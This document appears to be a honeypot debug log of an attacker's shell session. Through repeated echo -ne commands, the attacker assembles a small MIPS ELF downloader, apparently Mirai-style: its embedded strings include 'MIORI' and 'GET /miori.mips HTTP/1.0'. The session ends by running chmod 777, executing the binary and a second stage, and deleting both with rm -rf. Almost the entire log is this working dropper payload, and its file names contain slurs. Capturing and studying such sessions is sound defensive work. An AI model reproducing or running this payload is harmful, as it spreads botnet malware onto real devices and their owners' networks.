2022-10-22 23:05:08.737 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,56,92,120,48,51,92,120,57,102,92,120,101,48,92,120,50,49,92,120,48,48,92,120,48,48,92,120,102,56,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.738 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x3c\x1c\x00\x05\x27\x9c\x81\x20\x03\x99\xe0\x21\x00\x80\x10\x21\x00\xa0\x20\x21\x00\xc0\x28\x21\x00\xe0\x30\x21\x8f\xa7\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.742 - [Debug] [SHELL] line from reader: echo -ne "\x00\x3c\x1c\x00\x05\x27\x9c\x81\x20\x03\x99\xe0\x21\x00\x80\x10\x21\x00\xa0\x20\x21\x00\xc0\x28\x21\x00\xe0\x30\x21\x8f\xa7\x00" >> gay
2022-10-22 23:05:08.742 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,49,92,120,50,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,48,92,120,56,48,92,120,49,48,92,120,50,49,92,120,48,48,92,120,97,48,92,120,50,48,92,120,50,49,92,120,48,48,92,120,99,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,101,48,92,120,51,48,92,120,50,49,92,120,56,102,92,120,97,55,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.742 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x8f\xa8\x00\x14\x8f\xa9\x00\x18\x8f\xaa\x00\x1c\x27\xbd\xff\xe0\xaf\xa8\x00\x10\xaf\xa9\x00\x14\xaf\xaa\x00\x18\xaf\xa2\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.745 - [Debug] [SHELL] line from reader: echo -ne "\x10\x8f\xa8\x00\x14\x8f\xa9\x00\x18\x8f\xaa\x00\x1c\x27\xbd\xff\xe0\xaf\xa8\x00\x10\xaf\xa9\x00\x14\xaf\xaa\x00\x18\xaf\xa2\x00" >> gay
2022-10-22 23:05:08.746 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,56,102,92,120,97,56,92,120,48,48,92,120,49,52,92,120,56,102,92,120,97,57,92,120,48,48,92,120,49,56,92,120,56,102,92,120,97,97,92,120,48,48,92,120,49,99,92,120,50,55,92,120,98,100,92,120,102,102,92,120,101,48,92,120,97,102,92,120,97,56,92,120,48,48,92,120,49,48,92,120,97,102,92,120,97,57,92,120,48,48,92,120,49,52,92,120,97,102,92,120,97,97,92,120,48,48,92,120,49,56,92,120,97,102,92,120,97,50,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.746 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x1c\x8f\xa2\x00\x1c\x00\x00\x00\x0c\x14\xe0\x00\x03\x27\xbd\x00\x20\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x40\x20\x21\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.748 - [Debug] [SHELL] line from reader: echo -ne "\x1c\x8f\xa2\x00\x1c\x00\x00\x00\x0c\x14\xe0\x00\x03\x27\xbd\x00\x20\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x40\x20\x21\x8f\x99\x80" >> gay
2022-10-22 23:05:08.749 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,99,92,120,56,102,92,120,97,50,92,120,48,48,92,120,49,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,99,92,120,49,52,92,120,101,48,92,120,48,48,92,120,48,51,92,120,50,55,92,120,98,100,92,120,48,48,92,120,50,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,48,92,120,50,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.749 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x40\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x80\xb0\x03\x99\xe0\x21\x27\xbd\xff"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.752 - [Debug] [SHELL] line from reader: echo -ne "\x40\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x80\xb0\x03\x99\xe0\x21\x27\xbd\xff" >> gay
2022-10-22 23:05:08.752 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,48,92,120,98,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.752 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xe0\xaf\xbf\x00\x1c\xaf\xb0\x00\x18\xaf\xbc\x00\x10\x8f\x99\x80\x34\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x80\x80\x21\x8f\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.756 - [Debug] [SHELL] line from reader: echo -ne "\xe0\xaf\xbf\x00\x1c\xaf\xb0\x00\x18\xaf\xbc\x00\x10\x8f\x99\x80\x34\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x80\x80\x21\x8f\xbc\x00" >> gay
2022-10-22 23:05:08.756 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,101,48,92,120,97,102,92,120,98,102,92,120,48,48,92,120,49,99,92,120,97,102,92,120,98,48,92,120,48,48,92,120,49,56,92,120,97,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,56,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.756 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\xac\x50\x00\x00\x8f\xbf\x00\x1c\x8f\xb0\x00\x18\x24\x02\xff\xff\x03\xe0\x00\x08\x27\xbd\x00\x20\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.760 - [Debug] [SHELL] line from reader: echo -ne "\x10\xac\x50\x00\x00\x8f\xbf\x00\x1c\x8f\xb0\x00\x18\x24\x02\xff\xff\x03\xe0\x00\x08\x27\xbd\x00\x20\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.760 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,97,99,92,120,53,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,49,99,92,120,56,102,92,120,98,48,92,120,48,48,92,120,49,56,92,120,50,52,92,120,48,50,92,120,102,102,92,120,102,102,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,92,120,50,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.760 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x3c\x1c\x00\x05\x27\x9c\x80\x60\x03\x99\xe0\x21\x8f\x82\x80\x30\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.764 - [Debug] [SHELL] line from reader: echo -ne "\x00\x3c\x1c\x00\x05\x27\x9c\x80\x60\x03\x99\xe0\x21\x8f\x82\x80\x30\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.764 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,48,92,120,54,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,56,102,92,120,56,50,92,120,56,48,92,120,51,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.765 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x6d\x69\x70\x73\x00\x00\x00\x00\x4d\x49\x4f\x52\x49\x0a\x00\x00\x73\x73\x68\x64\x64\x6e\x69\x67\x00\x00\x00\x00\x47\x41\x46"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.766 - [Debug] [SHELL] line from reader: echo -ne "\x00\x6d\x69\x70\x73\x00\x00\x00\x00\x4d\x49\x4f\x52\x49\x0a\x00\x00\x73\x73\x68\x64\x64\x6e\x69\x67\x00\x00\x00\x00\x47\x41\x46" >> gay
2022-10-22 23:05:08.766 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,54,100,92,120,54,57,92,120,55,48,92,120,55,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,100,92,120,52,57,92,120,52,102,92,120,53,50,92,120,52,57,92,120,48,97,92,120,48,48,92,120,48,48,92,120,55,51,92,120,55,51,92,120,54,56,92,120,54,52,92,120,54,52,92,120,54,101,92,120,54,57,92,120,54,55,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,55,92,120,52,49,92,120,52,54,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.766 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x6d\x69\x6f\x72\x69\x2e\x6d\x69\x70\x73\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.769 - [Debug] [SHELL] line from reader: echo -ne "\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x6d\x69\x6f\x72\x69\x2e\x6d\x69\x70\x73\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d" >> gay
2022-10-22 23:05:08.770 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,97,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,55,92,120,52,53,92,120,53,52,92,120,50,48,92,120,50,102,92,120,54,100,92,120,54,57,92,120,54,102,92,120,55,50,92,120,54,57,92,120,50,101,92,120,54,100,92,120,54,57,92,120,55,48,92,120,55,51,92,120,50,48,92,120,52,56,92,120,53,52,92,120,53,52,92,120,53,48,92,120,50,102,92,120,51,49,92,120,50,101,92,120,51,48,92,120,48,100,92,120,48,97,92,120,48,100,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.770 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x0a\x00\x00\x00\x00\x42\x41\x47\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.773 - [Debug] [SHELL] line from reader: echo -ne "\x0a\x00\x00\x00\x00\x42\x41\x47\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.773 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,97,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,50,92,120,52,49,92,120,52,55,92,120,48,97,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.773 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x06\x90\x00\x40\x05\xc0\x00\x40\x01\x9c\x00\x40\x02"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.776 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x06\x90\x00\x40\x05\xc0\x00\x40\x01\x9c\x00\x40\x02" >> gay
2022-10-22 23:05:08.776 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,52,92,120,48,54,92,120,57,48,92,120,48,48,92,120,52,48,92,120,48,53,92,120,99,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,57,99,92,120,48,48,92,120,52,48,92,120,48,50,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.776 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x00\x40\x05\x70\x00\x40\x01\x28\x00\x40\x01\x74\x00\x40\x00\xa0\x00\x40\x01\xc4\x00\x40\x00\xc8\x00\x40\x00\xe4\x00\x40\x05"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.778 - [Debug] [SHELL] line from reader: echo -ne "\x10\x00\x40\x05\x70\x00\x40\x01\x28\x00\x40\x01\x74\x00\x40\x00\xa0\x00\x40\x01\xc4\x00\x40\x00\xc8\x00\x40\x00\xe4\x00\x40\x05" >> gay
2022-10-22 23:05:08.778 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,48,48,92,120,52,48,92,120,48,53,92,120,55,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,50,56,92,120,48,48,92,120,52,48,92,120,48,49,92,120,55,52,92,120,48,48,92,120,52,48,92,120,48,48,92,120,97,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,99,52,92,120,48,48,92,120,52,48,92,120,48,48,92,120,99,56,92,120,48,48,92,120,52,48,92,120,48,48,92,120,101,52,92,120,48,48,92,120,52,48,92,120,48,53,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.778 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x40\x01\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.782 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x40\x01\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67" >> gay
2022-10-22 23:05:08.782 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,50,101,92,120,55,51,92,120,54,56,92,120,55,51,92,120,55,52,92,120,55,50,92,120,55,52,92,120,54,49,92,120,54,50,92,120,48,48,92,120,50,101,92,120,55,52,92,120,54,53,92,120,55,56,92,120,55,52,92,120,48,48,92,120,50,101,92,120,55,50,92,120,54,102,92,120,54,52,92,120,54,49,92,120,55,52,92,120,54,49,92,120,48,48,92,120,50,101,92,120,54,55,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.782 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x6f\x74\x00\x2e\x62\x73\x73\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.784 - [Debug] [SHELL] line from reader: echo -ne "\x6f\x74\x00\x2e\x62\x73\x73\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.784 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,54,102,92,120,55,52,92,120,48,48,92,120,50,101,92,120,54,50,92,120,55,51,92,120,55,51,92,120,48,48,92,120,50,101,92,120,54,100,92,120,54,52,92,120,54,53,92,120,54,50,92,120,55,53,92,120,54,55,92,120,50,101,92,120,54,49,92,120,54,50,92,120,54,57,92,120,51,51,92,120,51,50,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.785 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.786 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.787 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.787 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\xa0\x00\x00\x00\xa0\x00\x00\x05\x40\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.790 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\xa0\x00\x00\x00\xa0\x00\x00\x05\x40\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.790 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,98,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,48,48,92,120,52,48,92,120,48,48,92,120,97,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,97,48,92,120,48,48,92,120,48,48,92,120,48,53,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.801 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x40\x05\xe0\x00\x00\x05\xe0\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.803 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x40\x05\xe0\x00\x00\x05\xe0\x00\x00\x00" >> gay
2022-10-22 23:05:08.808 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,51,50,92,120,48,48,92,120,52,48,92,120,48,53,92,120,101,48,92,120,48,48,92,120,48,48,92,120,48,53,92,120,101,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.808 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x10\x00\x00\x03\x00\x44\x06"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.811 - [Debug] [SHELL] line from reader: echo -ne "\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x10\x00\x00\x03\x00\x44\x06" >> gay
2022-10-22 23:05:08.811 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,57,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,52,52,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.811 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x30\x00\x00\x06\x30\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.815 - [Debug] [SHELL] line from reader: echo -ne "\x30\x00\x00\x06\x30\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00" >> gay
2022-10-22 23:05:08.815 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,51,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,101,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.815 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x08\x00\x00\x00\x03\x00\x44\x06\x90\x00\x00\x06\x84\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.817 - [Debug] [SHELL] line from reader: echo -ne "\x08\x00\x00\x00\x03\x00\x44\x06\x90\x00\x00\x06\x84\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00" >> gay
2022-10-22 23:05:08.817 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,52,52,92,120,48,54,92,120,57,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,56,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.817 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x23\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x06\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.820 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x23\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x06\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.820 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,50,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,56,92,120,48,48,92,120,48,48,92,120,48,54,92,120,56,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.820 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x84\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.822 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x84\x00\x00\x00" >> gay
2022-10-22 23:05:08.822 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,56,52,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.822 - [Debug] [SHELL] Attacker Keystroke: chmod[Space]777[Space]gay;./gay[Space];chmod[Space]777[Space]sshddnig;[Space]./sshddnig[Space]ssh.mips.echo;[Space]rm[Space]-rf[Space]gay;[Space]rm[Space]-rf[Space]sshddnig[LF]
2022-10-22 23:05:08.824 - [Debug] [SHELL] line from reader: chmod 777 gay;./gay ;chmod 777 sshddnig; ./sshddnig ssh.mips.echo; rm -rf gay; rm -rf sshddnig
